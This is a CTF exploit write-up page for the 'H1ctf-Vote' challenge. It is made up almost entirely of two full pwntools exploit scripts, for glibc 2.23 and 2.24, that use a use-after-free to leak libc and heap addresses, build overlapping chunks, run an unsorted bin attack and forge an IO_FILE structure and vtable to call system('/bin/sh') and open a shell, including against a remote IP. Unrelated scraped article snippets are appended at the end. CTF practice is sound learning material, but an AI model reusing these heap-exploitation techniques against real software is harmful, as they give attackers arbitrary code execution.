H1ctf-Vote
用来练习IO_FILE利用
glibc-2.23
# coding:utf-8
from pwn import *
from FILE import *
context.arch = 'amd64'
libc = ELF("/home/moonagirl/moonagirl/libc/libc_local_x64")
LOCAL = 1
if LOCAL:
# context.log_level = 'debug'
io = process('./vote')
main_arena_off = libc.symbols['__malloc_hook'] + 0x68
else:
main_arena_off = 0x3c4b78
#io = remote("47.90.103.10", 6000)
io = remote("47.97.190.1", 6000) def mmenu(choice):
io.recvuntil("Action: ")
io.sendline(str(choice)) def create(msize, content):
mmenu(0)
io.recvuntil("the name's size: ")
io.sendline(str(msize))
io.recvuntil("Please enter the name: ")
io.send(content) def show(idx):
mmenu(1)
io.recvuntil("Please enter the index: ")
io.sendline(str(idx)) def vote(idx):
mmenu(2)
io.recvuntil("Please enter the index: ")
io.sendline(str(idx)) def result():
mmenu(3) def vcancel(idx):
mmenu(4)
io.recvuntil("Please enter the index: ")
io.sendline(str(idx)) def pwnit():
create(0xE8, 'a0\n')
create(0x18, 'a1\n')
create(0xE8, 'a2\n')
create(0xE8, 'a3\n')
pay4load = '4'*0x180 + p64(0) + p64(0x81) + '\n'
create(0x208, pay4load)
create(0x30, 'a5\n')
vcancel(0)
vcancel(2)
# io.interactive()
show(0)
io.recvuntil("count: ")
libc.address = int(io.recvline()[:-1]) - main_arena_off
log.success("libc address: " + hex(libc.address))
io.recvuntil("time: ")
heap_address = int(io.recvline()[:-1]) - 0x130
log.success("heap address: " + hex(heap_address))
vcancel(3)
# overlap
fake_chunk = '6'*0xE0
fake_chunk += p64(0) + p64(0x2A1) # change size bigger
fake_chunk += p64(0xFFFFFFFFFFFFFFFF) + p64(0x555555)
fake_chunk += '\n'
create(0x1E8, fake_chunk) # 6
create(0xE8, 'a7\n') # clear unsorted bin
vcancel(3)
vcancel(4) # now unsorted bin have 2 chunks
# unsorted bin attack
payload = 'a'*0xE0
vtable_addr = heap_address + 0x410 fake_file = IO_FILE_plus_struct()
fake_file._flags = u64("/bin/sh\x00")
fake_file._IO_read_ptr = 0x61
fake_file._IO_read_base = libc.symbols['_IO_list_all'] - 0x10
fake_file._IO_write_base = 0
fake_file._IO_write_ptr = 1
fake_file.vtable = vtable_addr payload += str(fake_file) payload += p64(1)
payload += p64(2)
payload += p64(3)
payload += p64(libc.symbols["system"])
payload += '\n'
create(0x288, payload) # size 0x2A1
# now chunk3 removed from unsorted bin, unsorted bin only has chunk4
pause()
mmenu(0)
io.recvuntil("the name's size: ")
io.sendline(str(48))
io.interactive() if __name__ == "__main__":
pwnit()
pause()
glibc-2.24
# coding:utf-8
from pwn import *
from FILE import *
context.arch = 'amd64'
libc = ELF("./libc-2.24.so")
LOCAL = 1
if LOCAL:
# context.log_level = 'debug'
io = process('./vote',env={"LD_PRELOAD":"./libc-2.24.so"})
# __malloc_hook+68
main_arena_off = libc.symbols['__malloc_hook'] + 0x68
else:
main_arena_off = 0x3c4b78
#io = remote("47.90.103.10", 6000)
io = remote("47.97.190.1", 6000)
def z(a=''):
gdb.attach(io,a)
if a == '':
raw_input()
def mmenu(choice):
io.recvuntil("Action: ")
io.sendline(str(choice)) def create(msize, content):
mmenu(0)
io.recvuntil("the name's size: ")
io.sendline(str(msize))
io.recvuntil("Please enter the name: ")
io.send(content) def show(idx):
mmenu(1)
io.recvuntil("Please enter the index: ")
io.sendline(str(idx)) def vote(idx):
mmenu(2)
io.recvuntil("Please enter the index: ")
io.sendline(str(idx)) def result():
mmenu(3) def vcancel(idx):
mmenu(4)
io.recvuntil("Please enter the index: ")
io.sendline(str(idx)) def pwnit():
create(0xE8, 'a0\n')
create(0x18, 'a1\n')
create(0xE8, 'a2\n')
create(0xE8, 'a3\n')
pay4load = '4'*0x180 + p64(0) + p64(0x81) + '\n'
create(0x208, pay4load)
create(0x30, 'a5\n')
vcancel(0)
vcancel(2)
show(0)
io.recvuntil("count: ")
libc_base = int(io.recvline()[:-1]) - main_arena_off
io.recvuntil("time: ")
heap_address = int(io.recvline()[:-1]) - 0x130
system = libc.symbols['system']
_IO_list_all= libc.symbols['_IO_list_all']
binsh = libc.search('/bin/sh\x00').next()
_IO_str_jumps = 0x3BE4C0 + libc_base system = libc_base+libc.symbols['system']
_IO_list_all=libc_base+libc.symbols['_IO_list_all']
# _IO_str_jumps = libc_base+libc.symbols['_IO_str_jumps']
binsh = libc_base+libc.search('/bin/sh\x00').next() vcancel(3)
# overlap
fake_chunk = '6'*0xE0
fake_chunk += p64(0) + p64(0x2A1) # change size bigger
fake_chunk += p64(0xFFFFFFFFFFFFFFFF) + p64(0x555555)
fake_chunk += '\n'
create(0x1E8, fake_chunk) # 6 create(0xE8, 'a7\n') # clear unsorted bin
vcancel(3)
vcancel(4) # now unsorted bin have 2 chunks
# unsorted bin attack
payload = 'a'*0xE0
fake_file = IO_FILE_plus_struct()
fake_file._flags = 0
fake_file._IO_read_ptr = 0x61
fake_file._IO_read_base =_IO_list_all-0x10
fake_file._IO_buf_base = binsh
fake_file._mode = 0
fake_file._IO_write_base = 0
fake_file._IO_write_ptr = 1
fake_file.vtable = _IO_str_jumps-8
payload+=str(fake_file).ljust(0xe8,'\x00')+p64(system) create(0x288, payload) # size 0x2A1
# io.interactive()
# pause()
create(0, 'get shell')
io.interactive()
if __name__ == "__main__":
pwnit()
# pause()
.
H1ctf-Vote的更多相关文章
- BZOJ-1934 Vote 善意的投票 最大流+建图
1934: [Shoi2007]Vote 善意的投票 Time Limit: 1 Sec Memory Limit: 64 MB Submit: 1551 Solved: 951 [Submit][S ...
- bzoj1934: [Shoi2007]Vote 善意的投票
最大流..建图方式都是玄学啊.. //Dinic是O(n2m)的. #include<cstdio> #include<cstring> #include<cctype& ...
- 最小投票BZOJ 1934([Shoi2007]Vote 善意的投票-最小割)
上班之余抽点时间出来写写博文,希望对新接触的朋友有帮助.今天在这里和大家一起学习一下最小投票 1934: [Shoi2007]Vote 好心的投票 Time Limit: 1 Sec Memory L ...
- [POLITICS] S Korea lawmakers vote to impeach leader
South Korea's Parliament has voted to impeach President Park Geun-hye. The National Assembly motion ...
- BZOJ 1934: [Shoi2007]Vote 善意的投票 最小割
1934: [Shoi2007]Vote 善意的投票 Time Limit: 1 Sec Memory Limit: 256 MB 题目连接 http://www.lydsy.com/JudgeOnl ...
- A Linear Time Majority Vote Algorithm
介绍一种算法,它可以在线性时间和常数空间内,在一个数组内找出出现次数超过一半的某个数字. 要解决这个问题并不难,可以使用排序或哈希,但是这两种算法都不能同时满足时间或空间的要求. 然而,该算法(A L ...
- 11gR2更换OCR和VOTE
11gR2开始,OCR和VOTE它们被存储在ASM磁盘组,因此,更换OCR有两种方法,第一是使用ASM磁盘组drop disk数据重组后,另一种方法是OCR迁移到另一个磁盘组 第一种:add disk ...
- WeMall微商城源码投票插件Vote的主要源码
WeMall微信商城源码投票插件Vote,用于商城的签到系统,分享了部分比较重要的代码,供技术员学习参考 AdminController.class.php <?php namespace Ad ...
- 1934: [Shoi2007]Vote 善意的投票
1934: [Shoi2007]Vote 善意的投票 Time Limit: 1 Sec Memory Limit: 64 MBSubmit: 1174 Solved: 723[Submit][S ...
- Boyer-Moore Majority Vote Algorithm
介绍算法之前, 我们来看一个场景, 假设您有一个未排序的列表.您想知道列表中是否存在一个数量占列表的总数一半以上的元素, 我们称这样一个列表元素为 Majority 元素.如果有这样一个元素, 求出它 ...
随机推荐
- ajax跨域问题解决方案(jsonp,cors)
跨域 跨域有三个条件,满足任何一个条件就是跨域 1:服务器端口不一致 2:协议不一致 3:域名不一致 解决方案: 1.jsonp 在远程服务器上设法动态的把数据装进js格式的文本代码段中,供客户端调用 ...
- uuid安装 插件安装
yum -y install uuid uuid-devel 安装uuid包tar -zxvf uuid-1.6.1.tar.gzcd uuid-1.6.1./configuremakemake in ...
- 利用Python的smtplib和email发送邮件
原理 网上已经有了很多的教程讲解相关的发送邮件的原理,在这里还是推荐一下廖雪峰老师的Python教程,讲解通俗易懂.简要来说,SMTP是发送邮件的协议,Python内置对SMTP的支持,可以发送纯文本 ...
- Python 起步 多版本共存配置
上次我选择的是py2.x,如果我要再装一个py3.x呢 我们去设置环境变量,然后去命令行输入python,这里我故意把环境变量放在第一行,貌似换成3.7了 我们把2.7的放在3.7的前面呢?又换回去了 ...
- Linux--2 Linux之文档与目录结构、shell基本命令
一.Linux之文档与目录结构 1.Linux之文档与目录结构 Linux目录结构的组织形式和Windows有很大的不同.Linux没有“盘(如C盘.D盘.E盘)”的概念,而是建立一个根"/ ...
- SPA 介绍
SQL 性能分析器(SPA)工具概览 作为 Oracle Real Application Testing 选件/特性,这篇文章将提供一个关于 SQL 性能分析器(SPA)工具的简要概览.这是此系列的 ...
- Silverlight 创建 ImageButton
这几天一直在折腾怎么在silverlight 按钮上添加图片,直接向imagebutton那样设置成属性可以直接更改,最后到处查找资料终于搞出一个imagebutton了. <Style x:K ...
- View转换为Bitmap及getDrawingCache
View组件显示的内容可以通过cache机制保存为bitmap, 使用到的api有 void setDrawingCacheEnabled(boolean flag), Bitmap get ...
- C/C++规范学习:
一 关于浮点数: 1.1浮点数是否等于0判断:因为浮点数都有精度,不能拿浮点数直接和0.0f进行比较,而应该采用以下方法: if (f32Data == 0.0f) // 隐含错误的比较 #defin ...
- 【密码学】SSL双向认证以及证书的制作和使用
客户端认证服务器: 正规的做法是:到国际知名的证书颁发机构,如VeriSign申请一本服务器证书,比如支付宝的首页,点击小锁的图标,可以看到支付宝是通过VeriSign认证颁发的服务器证书: 我们用的 ...